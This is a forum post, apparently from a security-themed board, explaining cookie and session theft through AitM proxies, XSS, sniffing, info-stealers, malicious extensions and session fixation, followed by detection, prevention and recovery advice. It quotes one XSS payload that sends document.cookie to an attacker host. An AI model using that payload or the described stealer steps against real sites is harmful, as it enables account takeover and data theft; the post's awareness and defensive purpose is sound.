Fixxx
Moder
- Joined
- 20.08.24
- Messages
- 802
- Reaction score
- 3,029
- Points
- 93
Cookie theft is a form of cyberattack where attackers gain unauthorized access to a user's cookie files to steal confidential information. Cookies are small data fragments that websites store on a user's device to enhance interaction with web services. The browser stores cookies in a local SQLite database and automatically sends them with each HTTP request. Inside, there is only a string with the session ID, which confirms that the user has already been authenticated. If someone copies this ID and pastes it into their browser, the server will consider them "the same" user. Passwords, SMS codes and push confirmations become unnecessary. Cookies store various information about the user:
- Authentication and authorization data
- Personalization settings
- Shopping cart contents
- Session and preference information
- Session cookies - deleted when the browser is closed
- Persistent cookies - stored on the user's device and contain data such as login credentials and preferences
How Hackers Steal Cookies
1. AitM Proxy (Evilginx and similar tools)
The Evilginx tool is a transparent proxy that mirrors the original login portal of Microsoft 365, Google or Okta. The user enters their login, password and confirms entry through a push notification, while the proxy quickly captures both the authorization cookie and the refresh token. This all happens in one HTTP cycle, so the delay is barely noticeable. After the theft, the attacker can not only read emails but also reset MFA, set up email forwarding rules and ask the administrator to "confirm" fraudulent transfers.
2. Cross-Site Scripting (XSS)
XSS attacks are one of the most common methods where an attacker injects malicious scripts into content viewed by other users. If a web application doesn't properly sanitize user input, the attacker can include a script in their input that, when executed by another user's browser, can steal that user's cookies. If the developer did not mark the cookie with the HttpOnly flag, JavaScript can read its contents. It's enough to inject a classic script like
fetch('//attacker.com/?c=' + document.cookie) via XSS to intercept the token. Bug bounty statistics show that a quarter of all XSS vulnerabilities lead to cookie exports.3. Session Hijacking
Also known as cookie theft, this method involves intercepting cookies that authenticate users on websites. If an attacker can capture a user's session cookie, they can impersonate that user. Session hijacking often occurs in unsecured public Wi-Fi networks, where attackers can analyze network traffic using tools like packet analyzers to capture cookies.
4. Man-in-the-Middle (MitM) Attacks
In a MitM attack, the hacker positions themselves between the user and the web application. This position allows them to intercept and manipulate data transmitted between them, including cookies. This method is particularly effective on unencrypted HTTP connections and can be executed using techniques like ARP spoofing in local networks or exploiting vulnerabilities in SSL/TLS protocols on the broader internet.
5. Phishing and Classic Phishing with 2FA Bypass
By deceiving users and prompting them to visit fake websites that resemble legitimate ones, hackers can encourage users to voluntarily provide their personal data. On fake login landing pages, attackers place code that relays data to the real service in real-time. The victim believes they are logging in "as usual," while in the background, the proxy captures the latest cookie. Such kits are sold in bulk on underground forums: you input a bait link, the logo of the desired service, and the constructor automatically generates a "trap" with a Telegram bot for sending tokens.
6. Info-stealers: RedLine, RisePro, LummaC
Compact trojan stealers are distributed through infected ads, fake Windows 11 ISO images, pirated cracks,and key generators. Once launched, the malware:
- Finds Cookies.sqlite and Local State files in the Chromium profile
- Decrypts values via Windows CryptProtectData or Apple Keychain
- Packs cookies and tokens from Discord and Slack into a ZIP archive
- Sends the dump to a C2 server or a private Telegram channel of the operator.
In 2024, RedLine was responsible for infecting 55% of devices worldwide that suffered from stealer attacks.
7. Sniffing on Open Wi-Fi
Simple analysis of public networks shows that about 2% of websites still transmit authorization data over HTTP or do not set the Secure flag. Any sniffer in a café can see the line
Cookie: sessionid=... in plain text. From there, it’s just a matter of importing it into a browser and your email is open.8. Spy Browser Extensions
Fake extensions disguise themselves as tab managers or currency converters. After installation, they request permission for cookies, gaining visibility over all domains. After a few days, the module sends the cookie database to cloud storage. Since the extension is signed with a legitimate certificate from the Chrome Web Store, antivirus software doesn't flag it.
9. Token Sync in Cloud Services
Some SaaS platforms synchronize session tokens between mobile and desktop clients. If an attacker gains access to the smartphone's file system (through backup theft or physical device capture), cookies can be imported to a PC and used for login without a password.
10. Session Fixation via OAuth
In cases of flaws in the authorization flow, an attacker can present a victim with a pre-created session ID through the state parameter. After logging in, the victim continues to work in an already "marked" session, which the attacker controls and which is tied to their refresh token.
11. Session Fixation
A specific type of attack on web sessions, where the attacker doesn't so much steal an existing cookie from the victim as cunningly forces the victim to use a session identifier that the attacker already knows. The attacker generates a valid session ID on the target site and passes this identifier to the victim - most often through a specially crafted URL. If the web application is vulnerable, it will not change the identifier when the user logs in. The victim clicks the link, enters their login and password and the site ties their authenticated session to the pre-set cookie. As a result, the attacker, knowing the session ID value, gains access to the victim's account.
Risks and Consequences of Cookie Theft
- Unauthorized Access - An attacker with a stolen session cookie can gain unauthorized access to a user's account, potentially viewing, modifying or deleting confidential information.
- Identity Theft - By accessing sensitive information such as names, addresses, Social Security numbers or financial data, attackers can use it for identity theft or other fraudulent activities.
- Financial Losses - Attackers can use stolen sessions to make unauthorized purchases, transfer funds or access financial accounts, leading to financial losses for users or businesses.
- Reputational Damage - Both individuals and organizations can suffer reputational harm due to session hijacking, as it may lead to unauthorized disclosure of personal or confidential information or unauthorized actions taken on behalf of the victim.
- Loss of Privacy - Cookie theft can result in a loss of user privacy, as attackers may gain access to personal messages, browsing history or other private data.
- Legal Consequences - Organizations that fail to adequately protect user data or maintain proper security measures may face legal repercussions, fines or penalties due to data breaches or non-compliance with privacy regulations.
- Loss of Productivity - Addressing the aftermath of a session hijacking attack can be time-consuming and costly for both individuals and organizations, leading to a loss of productivity as they work to resolve the issue, recover lost data or restore affected systems.
- Illegal Actions in Your Name - With access to your session, an attacker can perform illegal actions while impersonating you. For example, they may send spam and phishing messages to your contacts, post offensive or prohibited content on social media or conduct fraudulent transactions.
How to Know if Your Cookies Have Been Stolen
Detecting cookie theft early is crucial for protecting your accounts and data. Look for the following signs:
- Suspicious account activity, such as unauthorized logins or transactions
- Unexpected password reset notifications
- Unforeseen changes in account settings, such as email addresses, phone numbers or credentials
- Repeated logouts that may indicate session hijacking
- Unusual login notifications or strange network traffic
- Erratic browser behavior or alerts from security software
- An increase in spam or phishing messages
- Unidentified devices in security logs
- Strange browser behavior: redirects to unfamiliar sites, pop-ups
- Abnormal network activity: connections to unknown servers
- Actions in your account that you didn't perform: read messages, sent emails
- Simultaneous logins from different geolocations - your account is accessed from an IP address in another city or country.
How to Prevent Cookie Theft
- Use FIDO2 Keys and 2FA/MFA - Hardware tokens are resistant to phishing because domain verification is built into the authorization process.
- Apply Strong Password Policies - Create strong, unique passwords and update them regularly to minimize the risk of unauthorized access.
- Be Cautious of Phishing and Risky Websites - Stay vigilant against phishing attempts and avoid dangerous websites to prevent exposure to malware.
- Regularly Clear Browser Cache - Frequently clear your browser's cache and cookies to remove potentially compromised cookies.
- Keep Software Updated - Ensure your browser, operating system and security software are up to date.
- Avoid Using Public Wi-Fi - Whenever possible, avoid conducting sensitive operations on public Wi-Fi networks that may be insecure.
- Use Private Networks - When accessing websites through public networks, use a virtual private network (VPN) to protect your traffic.
- Review Browser Extensions - Check installed browser extensions and remove any unused or suspicious ones.
Recovery from Cookie Theft
- Change Passwords - Change your passwords on all affected accounts.
- Clear Browser Cache - Remove all cookies and browser cache to eliminate potentially compromised data.
- Enable Two-Factor Authentication - Activate 2FA on all accounts where possible for an additional layer of protection.
- Monitor Accounts - Keep a close eye on your accounts for any unusual activity.
- Update Security Settings - Review and update security settings on your devices and accounts.
Conclusion
The world has transitioned to a phase where tokens are more important than passwords. AitM proxies, info-stealers and modified extensions steal millions of cookies daily. Users must understand the risks associated with cookie theft and take proactive steps to protect against such attacks. By keeping software updated, using strong passwords, enabling two-factor authentication and remaining vigilant against phishing attempts, you can significantly reduce the risk of cookie theft and safeguard your personal information. Ultimately, cookie theft is not just a technical issue but a whole class of threats that requires constant vigilance and adaptation. The better we understand the mechanisms of these attacks, the more effectively we can defend against them.